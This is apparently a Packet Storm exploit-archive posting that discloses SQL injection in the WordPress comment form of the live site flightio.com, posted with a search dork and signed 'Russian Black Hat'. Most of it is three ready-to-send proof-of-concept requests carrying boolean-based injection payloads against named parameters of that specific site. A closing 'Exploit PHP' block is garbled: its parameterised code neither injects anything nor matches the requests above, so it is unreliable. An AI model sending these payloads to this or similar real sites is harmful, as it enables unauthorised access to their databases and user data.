what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Flightio.com SQL Injection

Flightio.com SQL Injection
Posted Apr 9, 2024
Authored by E1.Coders

Flightio.com suffers from a remote SQL injection vulnerability. The researchers reporting this claimed the site has not responded to their reports so we are posting this to add visibility to the issue.

tags | exploit, remote, sql injection
SHA-256 | 287e946136487edac1a8bcbedb409990ac26461ab1f6840438934159773b37da

Flightio.com SQL Injection

Change Mirror Download

This site which has a security problem with the SQL INJECTION Vulnerability "CWE-89".
We have repeatedly reported to this site that it has a security problem and has ignored our report.
We want to record this security issue

#########################################################################################################################
# #
# Exploit Title : Site Flight agency airpol the Islamic Republic of Iran SQL INJECTION Vulnerability #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : https://flightio.com/ #
# #
# Security Risk : Medium #
# #
# Description : All target's IRanian AIRPOT websites #
# #
# DorK : "inurl:wp-comments-post.php%5Eauthor=" #
# #
#########################################################################################################################
# #
# Expl0iTs: #
#
# vuln type : SQLInjection
#
# refer address : https://flightio.com/blog/attractions/best-chahbahar-attractions/
#
# request type : POST
#
# action url : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0
#
# parameter : comment_parent
#
# description : POST SQL INJECTION BooleanBased String
#
# POC : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال/**/دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0%27/**/aNd/**/7462200=7462200/**/aNd/**/%276199%27=%276199
---------------------------------------
#
# Expl0iTs:
# vuln type : SQLInjection
#
# refer address : https://flightio.com/blog/travel-tips/norouz-holiday-trips-in-iran/
#
# request type : POST
#
# action url : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319
#
# parameter : ak_hp_textarea
#
# description : POST SQL INJECTION BooleanBased String
#
# POC : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال/**/دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319%27)/**/aNd/**/4442431=4442431/**/aNd/**/(%276199%27)=(%276199
------------------------------------------------
# # Expl0iTs:
# vuln type : SQLInjection
#
# refer address : https://flightio.com/blog/travel-tips/hormuz-island-travel-guide/
#
# request type : POST
#
# action url : https://flightio.com/blog/wp-comments-post.php^submit=ارسال دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999
#
# parameter : author
#
# description : POST SQL INJECTION BooleanBased String
#
# POC : https://flightio.com/blog/wp-comments-post.php^submit=ارسال/**/دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999%27)/**/oR/**/6197419=6197419/**/aNd/**/(%276199%27)=(%276199 #
#########################################################################################################################
# #
# | Security Is JOCK | #
# #
# | Russian Black Hat | #
# #
#########################################################################################################################


Exploit PHP :

global $wpdb;

$author = '99999999';
$comment = 'WCRTEXTAREATESTINPUT9752286';
$ak_hp_textarea = 'WCRTEXTAREATESTINPUT5571116';

$wpdb->prepare(
"INSERT INTO wp_comments (comment_post_ID, comment_author, comment_content, comment_parent, akismet_comment_nonce, ak_js, author) VALUES (%d, %s, %s, %d, %s, %d, %d)",
$comment_post_ID, $comment_author, $comment_content, $comment_parent, $akismet_comment_nonce, $ak_js, $author
);

$wpdb->insert('wp_comments', array(
'comment_post_ID' => $comment_post_ID,
'comment_author' => $comment_author,
'comment_content' => $comment_content,
'comment_parent' => $comment_parent,
'akismet_comment_nonce' => $akismet_comment_nonce,
'ak_js' => $ak_js,
'author' => $author
));
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close